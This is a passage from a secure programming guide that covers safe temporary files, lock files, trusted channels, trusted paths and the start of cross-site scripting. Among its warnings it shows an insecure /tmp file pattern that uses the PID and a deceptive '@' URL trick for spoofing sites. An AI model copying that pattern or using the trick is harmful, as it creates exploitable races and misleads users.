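#include <sys/types.h>
#include <unistd.h>

/*
 * Create "path" only if nothing with that name exists yet.
 * Returns an open descriptor, or -1 with errno set; errno is
 * EEXIST if a file or symbolic link already has that name.
 * (create_exclusive is a hypothetical helper name.)
 */
int create_exclusive(const char *path)
{
  int fd;

  do {
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
  } while (fd == -1 && errno == EINTR);  /* retry if interrupted */
  return fd;
}
]]>
</programlisting>
A caller would check for -1 and then recover gracefully (for example,
by reporting the error and exiting) instead of falling back to
opening the existing file.
</para>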

<para>
The GNOME programming guidelines recommend the following C code when
creating filesystem objects in shared (temporary) directories
to securely open temporary files [Quintero 2000]:
<programlisting width="68">
 char *filename;
 int fd;

 do {
   filename = tempnam (NULL, "foo");
   fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
   free (filename);
 } while (fd == -1);
</programlisting>
Note that, although the insecure function tempnam(3) is being used, it
is wrapped inside a loop using O_CREAT and O_EXCL to counteract its
security weaknesses, so this use is okay.
Note that you need to free() the filename.
You should close() and unlink() the file after you are done.
If you want to use the Standard C I/O library,
you can use fdopen() with mode "w+b"
to transform the file descriptor into a FILE *.
Note that this approach won't work over
NFS version 2 (v2) systems, because older
NFS doesn't correctly support O_EXCL.
One minor disadvantage of this approach is that, since
tempnam(3) can be used insecurely, various compilers and security scanners
may give you spurious warnings about its use.
This isn't a problem with mkstemp(3).
<!-- They also say you can use tmpfile() to do it in one step; I want
     to verify this before saying so. I'm concerned that some
     implementations may not "do it correctly", and it's better to
     re-implement than be insecure. -->
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
</para>

<para>
If you need a temporary file in a shell script, you're probably
best off using pipes, using a local directory (e.g., something inside the
user's home directory), or in some cases using the current directory.
That way, there's no sharing unless the user permits it.
If you really want/need the temporary file
to be in a shared directory like /tmp, do
<emphasis>not</emphasis> use the traditional shell
technique of using the process id in a template and just creating the file
using normal operations like ">".
Shell scripts can use "$$" to indicate the PID, but the
PID can be easily determined or guessed by an attacker,
who can then pre-create files or links with the same name.
Thus the following "typical" shell script is <emphasis>unsafe</emphasis>:
<programlisting width="72">
<![CDATA[
   echo "This is a test" > /tmp/test$$  # DON'T DO THIS.
]]>
</programlisting>
</para>


<para>
If you need a temporary file or directory
in a shell script, and you want it in /tmp,
a solution sometimes suggested is to use
mktemp(1), which is intended for use in shell scripts
(note that mktemp(1) and mktemp(3) are different things).
However, as Michal Zalewski notes, this is insecure in many environments
that run tmp cleaners;
the problem is that when a privileged program sweeps through a temporary
directory, it will probably expose a race condition.
Even if this weren't true, I do not recommend using shell scripts that
create temporary files in shared directories;
creating such files in private directories or using pipes instead is
generally preferable, even if you're sure your tmpwatch program is okay
(or that you have no local users).
If you must use mktemp(1), note that
mktemp(1) takes a template, then
creates a file or directory using O_EXCL and returns the resulting name;
thus, mktemp(1) won't work on NFS version 2 filesystems.
Here are some examples of correct use of mktemp(1) in Bourne shell scripts;
these examples are straight from the mktemp(1) man page:
<programlisting width="72">
<![CDATA[
 # Simple use of mktemp(1), where the script should quit
 # if it can't get a safe temporary file.
 # Note that this will be INSECURE on many systems, since they use
 # tmpwatch-like programs that will erase "old" files and expose race
 # conditions.

   TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
   echo "program output" >> $TMPFILE

  # Simple example, if you want to catch the error:

   TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
   if [ $? -ne 0 ]; then
      echo "$0: Can't create temp file, exiting..."
      exit 1
   fi
]]>
</programlisting>
</para>

<para>
Perl programmers should use File::Temp, which tries to
provide a cross-platform means of securely creating temporary files.
However, read the documentation carefully on how to use it properly first;
it includes interfaces to unsafe functions as well.
I suggest explicitly setting its safe_level to HIGH; this will invoke
additional security checks.
<ulink url="http://search.cpan.org/author/JHI/perl-5.8.0/lib/File/Temp.pm">
The Perl 5.8 documentation of File::Temp is available on-line</ulink>.
</para>

<para>
Don't reuse a temporary filename (i.e. remove and recreate it),
no matter how you obtained the ``secure'' temporary filename in the
first place.
An attacker can observe the original filename
and hijack it before you recreate it the second time.
And of course, always use appropriate file permissions.
For example, only allow world/group access
if you need the world or a group to access the file, otherwise
keep it mode 0600 (i.e., only the owner can read or write it).
</para>

<para>
Clean up after yourself, either by using an exit handler, or making
use of UNIX filesystem semantics and unlink()ing the file immediately
after creation so the directory entry goes away but the file itself
remains accessible until the last file descriptor pointing to it is
closed. You can then continue to access it within your program by
passing around the file descriptor.
Unlinking the file has a lot of advantages for code maintenance:
the file is automatically deleted, no matter how your program crashes.
It also decreases the likelihood that a maintainer will insecurely
use the filename (they need to use the file descriptor instead).
The one minor problem with immediate unlinking is that it makes it slightly
harder for administrators to see how disk space is being used, since
they can't simply look at the file system by name.
</para>

<para>
You might consider ensuring that your code for Unix-like systems
respects the environment variables TMP or TMPDIR
if the provider of these variable values is trusted.
By doing so, you make it possible for users to move their temporary
files into an unshared directory (eliminating the problems discussed here),
such as a subdirectory inside their home directory.
Recent versions of Bastille can set these variables to reduce the sharing
between users.
Unfortunately, many users set TMP or TMPDIR to a shared directory
(say /tmp), so your secure program must still
correctly create temporary files even if these environment variables
are set.
This is one advantage of the GNOME approach, since at least on some
systems tempnam(3) automatically uses TMPDIR, while
the mkstemp(3) approach requires more code to do this.
Please don't create yet more environment variables for temporary directories
(such as TEMP), and in particular don't create a different environment
name for each application (e.g., don't use "MYAPP_TEMP").
Doing so greatly complicates managing systems,
and users wanting a special temporary directory for a specific
application can just set the environment variable specially
when running that particular application.
Of course, if these environment variables might have been set by an
untrusted source, you should ignore them - which you'll do anyway
if you follow the advice in
<xref linkend="env-var-solution">.
</para>

<para>
These techniques don't work if the temporary directory is remotely
mounted using NFS version 2 (NFSv2), because NFSv2 doesn't properly
support O_EXCL.
See <xref linkend="locking-using-files"> for more information.
NFS version 3 and later properly support O_EXCL; the simple solution
is to ensure that temporary directories are either local or, if mounted
using NFS, mounted using NFS version 3 or later.
There is a technique for safely creating temporary files on NFS v2,
involving the use of link(2) and stat(2), but it's complex; see
<xref linkend="locking-using-files"> which has more information about this.
</para>

<para>
As an aside, it's worth noting that
FreeBSD has recently changed the mk*temp() family to get rid of
the PID component of the filename and replace the entire thing with
base-62 encoded randomness. This drastically raises the number of
possible temporary files for the "default" usage of 6 X's, meaning
that even mktemp(3) with 6 X's is reasonably (probabilistically) secure
against guessing, except under very frequent usage.
However, if you also follow the guidance here, you'll eliminate the
problem they're addressing.
</para>

<para>
Much of this information on temporary files was derived from
<ulink url="http://lwn.net/2000/1221/a/sec-tmp.php3">Kris Kennaway's
posting to Bugtraq about temporary files on December 15, 2000</ulink>.
</para>

<para>
I should note that the Openwall Linux patch from
<ulink url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>
includes an optional ``temporary file directory'' policy that counters
many temporary file based attacks.
The Linux Security Module (LSM) project includes an "owlsm" module
that implements some of the OpenWall ideas, so
Linux Kernels with LSM can quickly insert these rules into a running system.
When enabled, it has two protections:
<itemizedlist>
<listitem>
<para>
Hard links: Processes may not make hard links to files in certain cases.
The OpenWall documentation states that
"Processes may not make hard links to files they do not have write access to."
In the LSM version, the rules are as follows:
if both the process' uid and fsuid (usually the same as the euid)
are different from the linked-to file's uid, the
process uid is not root, and the process lacks the FOWNER capability, then
the hard link is forbidden.
The check against the process uid may be dropped someday
(it is a work-around for the atd(8) program), at which point the rule
would be:
if the process' fsuid (usually the same as the euid)
is different from the linked-to file's uid
and the process lacks the FOWNER capability, then the hard link is forbidden.
In other words, you can only create hard links to files you own,
unless you have the FOWNER capability.

<!-- do_owlsm_link -->
</para>
</listitem>
<listitem>
<para>
Symbolic links (symlinks): Certain symlinks are not followed.
The original OpenWall documentation states that
"root processes may not follow symlinks that
are not owned by root", but the actual rules (from looking at the code)
are more complicated.
In the LSM version, if the directory is sticky ("+t" mode, used in shared
directories like /tmp), symlinks are not followed if the symlink was
created by anyone other than either the owner of the directory or
the current process' fsuid (which is usually the effective uid).
<!-- see do_owlsm_follow_link -->
</para>
</listitem>
</itemizedlist>
Many systems do not implement this Openwall policy, so in general you
can't depend on it to protect your system.
However, I encourage using this policy on your own system, and
please make sure that your application will work when this policy is in place.
</para>

<!-- ???: I need to completely rewrite this race condition section -->

<!-- Not quite the right idea:
You can't even just check to see if the given file is a symbolic link;
if it's owned by an untrusted user, the user could change this after
the check.
One possible tool is the O_NOFOLLOW option for open(), a
FreeBSD extension also supported by Linux; this option says to not
follow symbolic links if the link the final portion of the path.
Unfortunately at this time this option is not portable.
-->

</sect3>


</sect2>


<sect2 id="locking">
<title>Locking</title>

<para>
There are often situations in which a program must ensure that it has
exclusive rights to something (e.g., a file, a device, and/or
existence of a particular server process).
Any system which locks resources must deal with the standard problems
of locks, namely, deadlocks (``deadly embraces''), livelocks,
and releasing ``stuck'' locks if a program doesn't clean up its locks.
A deadlock can occur if programs are stuck waiting for each other to
release resources.
For example, a deadlock would occur if
process 1 locks resources A and waits for resource B,
while process 2 locks resource B and waits for resource A.
Many deadlocks can be prevented by simply requiring all processes
that lock multiple resources to lock them
in the same order (e.g., alphabetically by lock name).
</para>

<sect3 id="locking-using-files">
<title>Using Files as Locks</title>

<para>
On Unix-like systems resource locking has traditionally been done by creating
a file to indicate a lock, because this is very portable.
It also makes it easy to ``fix'' stuck locks, because an administrator
can just look at the filesystem to see what locks have been set.
Stuck locks can occur because the program failed to clean up after
itself (e.g., it crashed or malfunctioned) or because the whole system crashed.
Note that these are ``advisory'' (not ``mandatory'') locks - all processes
needing the resource must cooperate to use these locks.
<!-- ??? Discuss various approaches to resolve this, e.g.,
There are some standard tricks to simplify clean-up for these
conditions.
For example, a parent process can set a lock,
call a child to do the work (make sure only the parent can call the child
in a way that it can work), and when the child returns the parent releases
the lock.
Or, a cron job can look at the locks (which contain a process id); if
the process isn't alive, it would erase the lock and restart the process.
Finally, the lock file can be erased as part of system start-up.
-->
</para>

<para>
However, there are several traps to avoid.
First, don't use the technique used by
very old Unix C programs,
which is calling creat() or its open() equivalent, the open() mode
O_WRONLY | O_CREAT | O_TRUNC, with the file mode set to 0 (no permissions).
For normal users on normal file systems, this works, but
this approach fails to lock the file when the user has root privileges.
Root can always perform this operation, even when the file
already exists.
In fact, old versions of Unix had this particular problem in the
old editor ``ed'' -- the symptom was that
occasionally portions of the password file would be placed in user's files
[Rochkind 1985, 22]!
Instead, if you're creating a lock for processes that are on the local
filesystem, you should use open() with the flags
O_WRONLY | O_CREAT | O_EXCL (and again, no permissions, so that other
processes with the same owner won't get the lock).
Note the use of O_EXCL, which is the official way to
create ``exclusive'' files; this even works for root on a local filesystem
[Rochkind 1985, 27].
</para>
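<para>
The O_EXCL-based lock described above might look like the following
sketch for a lock file on a local filesystem.
The function names acquire_lock() and release_lock() are hypothetical,
chosen only for this example, and the sketch makes no attempt to
detect or clear stuck locks.
<programlisting width="72">
<![CDATA[
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Try to take the lock by creating the lock file exclusively,
 * with no permissions (mode 0).
 * Returns 0 if we now hold the lock, -1 otherwise; errno is
 * EEXIST when someone else already holds it.
 */
int acquire_lock(const char *lockfile)
{
  int fd = open(lockfile, O_WRONLY | O_CREAT | O_EXCL, 0);

  if (fd == -1) {
    return -1;
  }
  (void) close(fd);  /* the file's existence is the lock */
  return 0;
}

/* Release the lock by removing the lock file. */
int release_lock(const char *lockfile)
{
  return unlink(lockfile);
}
]]>
</programlisting>
Because the test is the atomic creation itself and not a permission
check, a second acquire_lock() call fails with EEXIST even when the
caller is root.
</para>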

<para>
Second, if the lock file may be on an NFS-mounted filesystem, then you have
the problem that NFS version 2 doesn't completely support normal file semantics.
This can even be a problem for work that's supposed to be ``local'' to a
client, since some clients don't have local disks and may have <emphasis remap="it">all</emphasis>
files remotely mounted via NFS.
The manual for <emphasis remap="it">open(2)</emphasis> explains how to handle things in this case
(which also handles the case of root programs):
</para>

<para>
<QUOTE>... programs which rely on
[the O&lowbar;CREAT and O&lowbar;EXCL flags of open(2) to work on
filesystems accessed via NFS version 2]
for performing locking tasks will contain a race condition. The solution
for performing atomic file locking using a lockfile is to create
a unique file on the same filesystem (e.g., incorporating
hostname and pid), use link(2) to make a link to
the lockfile and use stat(2) on the unique file to
check if its link count has increased to 2. Do
not use the return value of the link(2) call.</QUOTE>
</para>

<para>
Obviously, this solution only works if all programs doing the locking
are cooperating, and if all non-cooperating programs aren't allowed to
interfere.
In particular, the directories you're using for file locking
must not have permissive file permissions for creating and removing files.
</para>
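<para>
The link(2) and stat(2) procedure quoted from the open(2) manual can
be sketched in C as follows.
This is only an illustration under stated assumptions: the function
name acquire_lock_by_link() is hypothetical, the unique name is built
from the lock file name, the hostname and the pid (so it is not unique
between threads of one process), and the fixed buffer sizes are
arbitrary.
<programlisting width="72">
<![CDATA[
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Take "lockfile" using link(2) and stat(2) instead of O_EXCL.
 * Returns 0 if the lock was obtained, -1 otherwise.
 */
int acquire_lock_by_link(const char *lockfile)
{
  char host[256];
  char unique[1024];
  struct stat st;
  int fd, n, rc, got_lock;

  if (gethostname(host, sizeof(host)) == -1) {
    return -1;
  }
  host[sizeof(host) - 1] = '\0';
  n = snprintf(unique, sizeof(unique), "%s.%s.%ld",
               lockfile, host, (long) getpid());
  if (n < 0 || (size_t) n >= sizeof(unique)) {
    return -1;
  }

  /* Create the unique file on the same filesystem as the lock. */
  fd = open(unique, O_WRONLY | O_CREAT, 0600);
  if (fd == -1) {
    return -1;
  }
  (void) close(fd);

  /* Deliberately ignore link()'s result; trust the link count. */
  rc = link(unique, lockfile);
  (void) rc;
  got_lock = (stat(unique, &st) == 0 && st.st_nlink == 2);

  /* The unique name is no longer needed; lockfile (if any) stays. */
  (void) unlink(unique);
  return got_lock ? 0 : -1;
}
]]>
</programlisting>
The lock is released by calling unlink() on the lock file itself.
</para>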

<para>
NFS version 3 added support for O_EXCL mode in open(2);
see IETF RFC 1813,
in particular the "EXCLUSIVE" value to the "mode" argument of "CREATE".
Sadly, not everyone has switched to NFS version 3 or higher at the time of this
writing, so you can't depend on this yet in portable programs.
Still, in the long run there's hope that this issue will go away.
</para>

<para>
If you're locking a device or the existence of a process on a local
machine, try to use standard conventions.
I recommend using the Filesystem Hierarchy Standard (FHS);
it is widely referenced by Linux systems, but it also tries to incorporate
the ideas of other Unix-like systems.
The FHS describes
standard conventions for such locking files, including naming, placement,
and standard contents of these files [FHS 1997].
If you just want to be sure that your server doesn't execute more than once
on a given machine, you should usually create a process identifier file
named /var/run/NAME.pid with the pid as its contents.
In a similar vein, you should place lock files,
such as device lock files, in /var/lock.
This approach has the minor disadvantage of leaving files hanging around
if the program suddenly halts,
but it's standard practice and that problem is
easily handled by other system tools.
</para>
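<para>
A process identifier file of the kind just described could be written
with a sketch like the one below.
The helper name write_pid_file() and the mode 0644 are assumptions of
this example; the contents are the pid in ASCII decimal followed by a
newline.
Handling of a stale file left behind by a crashed server is
deliberately omitted.
<programlisting width="72">
<![CDATA[
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Create "path" exclusively and write our pid into it.
 * Returns 0 on success, -1 if the file already exists or on error.
 */
int write_pid_file(const char *path)
{
  char buf[32];
  int fd, len;

  fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
  if (fd == -1) {
    return -1;  /* probably another instance is running */
  }
  len = snprintf(buf, sizeof(buf), "%ld\n", (long) getpid());
  if (len < 0 || len >= (int) sizeof(buf) ||
      write(fd, buf, (size_t) len) != (ssize_t) len) {
    (void) close(fd);
    (void) unlink(path);  /* don't leave a partial file behind */
    return -1;
  }
  return close(fd);
}
]]>
</programlisting>
A server would call this once at start-up, for example with a path
such as /var/run/NAME.pid, and remove the file when it exits normally.
</para>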

<para>
It's important that the programs which are cooperating using files to
represent the locks use the same
directory, not just the same directory name.
This is an issue with networked systems: the FHS explicitly notes that
/var/run and /var/lock are unshareable, while /var/mail is shareable.
Thus, if you want the lock to work on a single machine, but not interfere
with other machines, use unshareable directories like /var/run
(e.g., you want to permit each machine to run its own server).
However, if you want all machines sharing files in a network to obey the
lock, you need to use a directory that they're sharing; /var/mail is
one such location.  See FHS section 2 for more information on this subject.
</para>

</sect3>

<sect3 id="other-locking">
<title>Other Approaches to Locking</title>

<para>
Of course, you need not use files to represent locks.
Network servers often need not bother; the mere act of binding to a port
acts as a kind of lock, since if there's an existing server bound to a given
port, no other server will be able to bind to that port.
</para>

<para>
Another approach to locking
is to use POSIX record locks, implemented through fcntl(2) as a
``discretionary lock''.
These are discretionary, that is, using them requires the cooperation of the
programs needing the locks (just as the approach to using files to
represent locks does).
There's a lot to recommend POSIX record locks:
POSIX record locking is supported on nearly all Unix-like platforms
(it's mandated by POSIX.1), it
can lock portions of a file (not just a whole file), and it can handle the
difference between read locks and write locks.
Even more usefully, if a process dies, its locks are automatically removed,
which is usually what is desired.
<!-- ???:  What about locking across NFS, flock, lockf?
XBoing doc file "problems.txt" says that lockf() works over NFS when
lockd daemon is running. -->
</para>
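<para>
As a rough sketch of how a POSIX record lock is requested through
fcntl(2), consider the helper below.
The name set_record_lock() is hypothetical; it uses the non-blocking
F_SETLK command, so it returns at once if another process holds a
conflicting lock.
<programlisting width="72">
<![CDATA[
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Set or clear a record lock on the byte range [start, start+len)
 * of the open file "fd"; a len of 0 means "to end of file".
 * "type" is F_RDLCK (read lock), F_WRLCK (write lock) or
 * F_UNLCK (unlock).
 * Returns 0 on success, -1 (with errno set) if the lock is held
 * by another process or on error.
 */
int set_record_lock(int fd, short type, off_t start, off_t len)
{
  struct flock fl = {0};

  fl.l_type = type;
  fl.l_whence = SEEK_SET;  /* start is an absolute offset */
  fl.l_start = start;
  fl.l_len = len;
  return fcntl(fd, F_SETLK, &fl);
}
]]>
</programlisting>
Keep in mind that these locks belong to the process: a second request
from the same process simply replaces its earlier lock on that range,
so a conflict can only be observed from a different process.
</para>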

<para>
You can also use mandatory locks, which are based on System V's
mandatory locking scheme.
These only apply to files where the locked file's setgid bit is set, but
the group execute bit is not set.
Also, you must mount the filesystem to permit mandatory file locks.
In this case, every read(2) and write(2) is checked for locking;
while this is more thorough than advisory locks, it's also slower.
Also, mandatory locks don't port as widely to other Unix-like systems
(they're available on Linux and System V-based systems, but not necessarily
on others).
Note that processes with root privileges
can be held up by a mandatory lock, too, making it possible that
this could be the basis of a denial-of-service attack.
</para>

</sect3>

</sect2>

</sect1>

<sect1 id="trustworthy-channels">
<title>Trust Only Trustworthy Channels</title>

<para>
In general, only trust information (input or results)
from trustworthy channels.
For example,
the routines getlogin(3) and ttyname(3) return information that can be
controlled by a local user, so don't trust them for security purposes.
</para>

<para>
In most computer networks (and certainly for the Internet at large),
no unauthenticated transmission is trustworthy.
For example,
packets sent over the public Internet can be viewed and modified at any
point along their path, and arbitrary new packets can be forged.
These forged packets might include forged information about the sender
(such as their machine (IP) address and port) or receiver.
Therefore, don't use these values as your primary criteria for
security decisions unless you can authenticate them (say using cryptography).
</para>

<para>
This means that, except under special circumstances,
two old techniques for authenticating users
in TCP/IP should often not be used as the sole authentication mechanism.
One technique is to limit users to ``certain machines'' by checking
the ``from'' machine address in a data packet; the other is to
limit access by requiring that the sender use a ``trusted'' port number
(a number less than 1024).
The problem is that in many environments an attacker can forge these values.
</para>

<para>
In some environments, checking these values (e.g., the sending machine
IP address and/or port) can have some value, so
it's not a bad idea to support such checking as an option in a program.
For example, if a system runs behind a firewall, the firewall can't
be breached or circumvented, and the firewall stops
external packets that claim to be from the inside,
then you can claim that any packet saying it's from the inside really does.
Note that you can't be sure the packet actually comes from the machine
it claims it comes from - so you're only countering external threats,
not internal threats.
However, broken firewalls, alternative paths, and mobile code make
even these assumptions suspect.
</para>

<para>
The problem is supporting untrustworthy information as the only way
to authenticate someone.
If you need a trustworthy channel over an untrusted network,
in general you need some sort of cryptographic
service (at the very least, a cryptographically safe hash).
See <xref linkend="crypto">
for more information on cryptographic algorithms and protocols.
If you're implementing a standard and inherently insecure protocol
(e.g., ftp and rlogin), provide safe defaults and document
the assumptions clearly.
</para>


<para>
The Domain Name System (DNS) is widely used on the Internet to maintain
mappings between the names of computers and their IP (numeric) addresses.
The technique called ``reverse DNS'' eliminates some simple
spoofing attacks, and is useful for determining a host's name.
However, this technique is not trustworthy for authentication decisions.
The problem is that, in the end, a DNS request will be sent
to some remote system that may be controlled by an attacker.
Therefore, treat DNS results as an input that needs
validation and don't trust it for serious access control.
</para>

<para>
Arbitrary email (including the ``from'' value of addresses)
can be forged as well.
Using digital signatures is a method to thwart many such attacks.
A more easily thwarted approach is to require emailing back and forth
with special randomly-created values, but for low-value transactions
such as signing onto a public mailing list this is usually acceptable.
</para>

<para>
Note that in any client/server model, including CGI, the server
must assume that the client (or someone interposing between the
client and server) can modify any value.
For example, so-called ``hidden fields'' and cookie values can be
changed by the client before being received by CGI programs.
These cannot be trusted unless special precautions are taken.
For example, the hidden fields could be signed in a way the client
cannot forge as long as the server checks the signature.
The hidden fields could also be encrypted using a key only the trusted
server could decrypt (this latter approach is the basic idea behind the
Kerberos authentication system).
InfoSec labs has further discussion about hidden fields and applying
encryption at
<ulink url="http://www.infoseclabs.com/mschff/mschff.htm">http://www.infoseclabs.com/mschff/mschff.htm</ulink>.
In general, you're better off keeping data you care about at the server end
in a client/server model.
In the same vein,
don't depend on HTTP_REFERER for authentication in a CGI program, because
this is sent by the user's browser (not the web server).
</para>
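
<para>
As a rough illustration of signing a hidden field, here is a minimal
Python sketch; it is not taken from any particular system.
The names SERVER_KEY, sign_field, and verify_field are hypothetical,
and the sketch assumes the server holds a secret key that the client
never sees.
It uses an HMAC (a keyed cryptographic hash) from Python's standard
hmac module:
<programlisting>
import hashlib
import hmac

# Hypothetical server-side secret; in practice, load it from protected
# storage and never send it to the client.
SERVER_KEY = b"replace-with-a-long-random-secret"

def _tag(value):
    """Compute the HMAC-SHA256 tag for value as a hex string."""
    return hmac.new(SERVER_KEY, value.encode("utf-8"),
                    hashlib.sha256).hexdigest()

def sign_field(value):
    """Return 'value|tag' for use as the hidden field's content."""
    return value + "|" + _tag(value)

def verify_field(signed):
    """Return the original value, or None if the tag does not match."""
    value, sep, tag = signed.rpartition("|")
    if not sep:
        return None
    # compare_digest avoids leaking information through timing.
    if hmac.compare_digest(tag.encode("utf-8"),
                           _tag(value).encode("utf-8")):
        return value
    return None
</programlisting>
Note that a signature like this only shows that the server produced
the value at some point; it doesn't stop a client from replaying an old
signed value, so you may also need to bind the value to a session or
an expiration time.
</para>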

<para>
This issue applies to data referencing other data, too.
For example, HTML and XML allow you to include by reference other files
(e.g., DTDs and style sheets) that may be stored remotely.
However, those external references could be modified so that users
see a very different document than intended;
a style sheet could be modified to ``white out'' words at critical
locations, deface its appearance, or insert new text.
External DTDs could be modified to prevent use of the document
(by adding declarations that break validation) or insert different
text into documents [St. Laurent 2000].
</para>

</sect1>

<sect1 id="trusted-path">
<title>Set up a Trusted Path</title>
<para>
The counterpart to needing trustworthy channels
(see <xref linkend="trustworthy-channels">)
is assuring users that they
really are working with the program or system they intended to use.
</para>

<para>
The traditional example is a ``fake login'' program.
If a program is written to look like the login screen of a system, then
it can be left running.
When users try to log in, the fake login program can then capture user
passwords for later use.
</para>

<para>
A solution to this problem is a ``trusted path.''
A trusted path is simply some mechanism that provides confidence that the
user is communicating with what the user intended to communicate with,
ensuring that attackers can't intercept or modify whatever information
is being communicated.
<!-- A gross simplification of the CC. See:
  http://www.commoncriteria.org/cc/part2/part2anftp.html -->
</para>

<para>
If you're asking for a password, try to set up a trusted path.
Unfortunately, stock Linux distributions and many other Unixes don't
have a trusted path even for their normal login sequence.
One approach is to
require pressing an unforgeable key before login, e.g.,
Windows NT/2000 uses ``control-alt-delete'' before logging in; since
normal programs in Windows can't intercept this key pattern, this
approach creates a trusted path.
There's a Linux equivalent, termed the
<ulink url="http://lwn.net/2001/0322/a/SAK.php3">Secure Attention Key
(SAK)</ulink>; it's recommended that this be mapped to
``control-alt-pause''.
Unfortunately, at the time of this writing SAK is immature and not
well-supported by Linux distributions.
Another approach for implementing a trusted path
locally is to use a separate display that only the login
program can control.
For example, if only trusted programs could modify the keyboard lights
(the LEDs showing Num Lock, Caps Lock, and Scroll Lock),
then a login program could display a running pattern to indicate that
it's the real login program.
Unfortunately, since in current Linux normal users can change the LEDs,
the LEDs can't currently be used to confirm a trusted path.
</para>

<para>
Sadly, the problem is much worse for network applications.
Although setting up a trusted path is desirable for network applications,
completely doing so is quite difficult.
When sending a password over a network, at the very least
encrypt the password between trusted endpoints.
This will at least prevent eavesdropping of passwords by those not
connected to the system, and at least make attacks harder to perform.
If you're concerned about trusted path for the actual communication, make
sure that the communication is
encrypted and authenticated (or at least authenticated).
</para>

<para>
It turns out that this isn't enough to have a trusted path
to networked applications, in particular for web-based applications.
There are documented methods for fooling users of web browsers into thinking
that they're at one place when they are really at another.
For example, Felten [1997] discusses ``web spoofing'',
where users believe they're viewing one web page when in fact all the
web pages they view go through an attacker's site (who can then monitor
all traffic and modify any data sent in either direction).
This is accomplished by rewriting URLs.
The rewritten URLs can be made nearly invisible
by using other technology (such as Javascript) to hide any possible
evidence in the status line, location line, and so on.
See their paper for more details.
Another technique for hiding such URLs is exploiting rarely-used URL
syntax, for example, the URL
``http://www.ibm.com/stuff@mysite.com''
is actually a request to view ``mysite.com'' (a potentially malevolent site)
using the unusual username ``www.ibm.com/stuff''.
If the URL is long enough,
the real material won't be displayed and users are unlikely to
notice the exploit anyway.
Yet another approach is to create sites with names deliberately similar
to the ``real'' site - users may not know the difference.
In all of these cases, simply encrypting the line doesn't help -
the attacker can be quite content in encrypting data while completely
controlling what's shown.
</para>

<para>
Countering these problems is more difficult;
at this time I have no good technical solution for fully preventing
``fooled'' web users.
I would encourage web browser developers to counter such ``fooling'',
making it easier to spot.
If it's critical that your users connect to the correct site,
have them use simple procedures to counter the threat.
Examples include having them halt and restart their browser, and making sure
that the web address is very simple and not normally misspelled
(so misspelling it is unlikely).
You might also want to gain ownership of some ``similar'' sounding DNS names,
and search for other such DNS names and material to find attackers.
</para>

</sect1>


<sect1 id="internal-check">
<title>Use Internal Consistency-Checking Code</title>

<para>
The program should check to ensure that its call arguments and basic state
assumptions are valid.
In C, macros such as assert(3) may be helpful in doing so.
<!-- ??? See programming by contract, championed in Eiffel,
     and info on formal proofs. -->
</para>
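
<para>
The same idea carries over to other languages.
Here is a minimal sketch in Python, using a hypothetical withdraw()
function invented for illustration.
It uses explicit checks rather than Python's assert statement, because
assert statements are removed when Python runs with the -O option:
<programlisting>
def withdraw(balance, amount):
    """Return the new balance after removing amount (integer cents)."""
    # Check the call arguments explicitly; unlike an assert statement,
    # these checks still run when Python is started with -O.
    if not isinstance(balance, int) or not isinstance(amount, int):
        raise TypeError("balance and amount must be integers")
    if amount not in range(0, balance + 1):
        raise ValueError("amount must be between 0 and the balance")
    new_balance = balance - amount
    # Check a basic state assumption before returning.
    if new_balance not in range(0, balance + 1):
        raise RuntimeError("internal consistency check failed")
    return new_balance
</programlisting>
</para>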

</sect1>

<sect1 id="self-limit-resources">
<title>Self-limit Resources</title>

<para>
In network daemons, shed or limit excessive loads.
Set limit values (using setrlimit(2)) to limit the resources that will be used.
At the least, use setrlimit(2) to disable creation of ``core'' files.
For example, by default
Linux will create a core file that saves all program memory if the
program fails abnormally, but such a file might include passwords or
other sensitive data.
</para>
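
<para>
For illustration, here is a minimal sketch of disabling core files
from Python, whose standard resource module wraps setrlimit(2) on
Unix-like systems.
The function name disable_core_files is hypothetical; a C program would
call setrlimit(2) directly with RLIMIT_CORE in the same way:
<programlisting>
import resource

def disable_core_files():
    """Set both the soft and hard core-file size limits to zero."""
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
</programlisting>
Call this early in the program, before any sensitive data is read
into memory.
Since the hard limit is lowered too, an unprivileged process cannot
raise it again later.
</para>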

</sect1>

<sect1 id="cross-site-malicious-content">
<title>Prevent Cross-Site (XSS) Malicious Content</title>
<para>
Some secure programs accept data from one untrusted user (the attacker)
and pass that data on to a different user's application (the victim).
If the secure program doesn't protect the victim, the
victim's application (e.g., their web browser)
may then process that data in a way harmful to the victim.
This is a particularly common problem for web applications using HTML or XML,
where the problem goes by several names including ``cross-site scripting'',
``malicious HTML tags'', and ``malicious content.''
This book will call this problem ``cross-site malicious content,''
since the problem isn't limited to scripts or HTML, and its cross-site nature
is fundamental.
Note that this problem isn't limited to web applications, but since
this is a particular problem for them, the rest of this discussion
will emphasize web applications.
As will be shown in a moment, sometimes an attacker can cause a victim
to send data from the victim to the secure program, so the secure program
must protect the victim from himself.
</para>

<sect2 id="explain-cross-site">
<title>Explanation of the Problem</title>

<para>
Let's begin with a simple example.
Some web applications are designed to
permit HTML tags in data input from users that will later
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
If nothing is done to prevent it,
these tags can be used by malicious users to attack other users by inserting
scripts,
Java references (including references to hostile applets), DHTML tags,
early document endings (via &lt;/HTML&gt;), absurd font size requests,
and so on.
This capability can be exploited for a wide range of effects,
such as exposing SSL-encrypted connections, accessing restricted web
sites via the client, violating domain-based security policies,
making the web page unreadable,
making the web page unpleasant to use (e.g., via annoying banners
and offensive material),
permitting privacy intrusions (e.g., by inserting a web bug to learn exactly
who reads a certain page),
creating
denial-of-service attacks (e.g., by creating an ``infinite'' number
of windows), and even very destructive attacks (by inserting
attacks on security vulnerabilities such as scripting languages or
buffer overflows in browsers).
By embedding malicious FORM tags at the right place, an intruder
